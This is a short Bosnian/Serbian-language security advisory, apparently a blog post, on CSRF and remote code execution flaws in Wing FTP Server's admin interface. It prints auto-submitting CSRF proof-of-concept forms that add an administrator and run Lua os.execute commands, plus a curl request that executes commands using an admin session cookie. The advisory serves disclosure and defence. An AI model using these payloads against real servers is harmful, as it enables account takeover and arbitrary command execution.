Wing FTP Server CSRF ranjivost i ranjivost na udaljeno izvršavanje koda

Wing FTP Server CSRF ranjivost i ranjivost na udaljeno izvršavanje koda

Veliki broj funkcionalnost kao dodavanje i brosanje domenskih administratora, regularnih korisnika, pokretanje i zaustavljanje servera ili kreiranje i brisanje FTP domena su ranjivi na CSRF

Proof of concept za dodavanje domenskog administratora : 

<html>
  <body>
    <form action=”http://<server address>:5466/admin_addadmin.html” method=”POST”>
      <input type=”hidden” name=”admin” value=”&#123;&quot;username&quot;&#58;&quot;admin2&quot;&#44;&quot;password&quot;&#58;&quot;admin2&quot;&#44;&quot;oldpassword&quot;&#58;&quot;&quot;&#44;&quot;readonly&quot;&#58;0&#44;&quot;domainadmin&quot;&#58;1&#44;&quot;domainlist&quot;&#58;&quot;test&quot;&#44;&quot;mydirectory&quot;&#58;&quot;&quot;&#44;&quot;ipmasks&quot;&#58;&#91;&#93;&#125;” />
      <input type=”submit” value=”Submit request” />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Remote code execution ranjivost admin interfejsa se može eksploatisati koristenjem LUA CLI i gore navedene CSRF ranjivosti ili putem autentifikovanog administratora za izvršavanje komandi na nivou privilegija web servera.

Proof of concept za napad putem CSRF :

<html>
  <body>
    <form action=”http://<server address>:5466/admin_lua_script.html” method=”POST” enctype=”text/plain”>
      <input type=”hidden” name=”command” value=”os.execute("<any OS command here>")” />
      <input type=”submit” value=”Submit request” />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html> 

Proof of concept za napad putem autentifikovanog administratora : 

1) Koristenje LUA konzolnog interfejsa za direktno izvršavanje komande os.execute("<OS komanda>").
2) POST koristeći CURL sa autentikovanim kukijem:
curl -i -s -k  -X "POST" -b "admin_lang=english; UIDADMIN=b8b208e2239f462c11641eaa10cde7b0" –data-binary $"command=os.execute("cmd.exe")"
"http://<server address>:5466/admin_lua_script.html"

Parametar: “command”
Parametarski tip : POST
 

Bilo koja OS komanda se može izvršiti putem os.execute(….).

Verzija 4.4.7 rjesila je CSRF problem ali ne i RCE putem autentikovanog administratora.

 

Izvor:http://www.securityfocus.com

Značaj ranjivosti:VAŽNO

Platforma:Linux

CVE oznaka:CVE-2015-4107,4018

Leave a Reply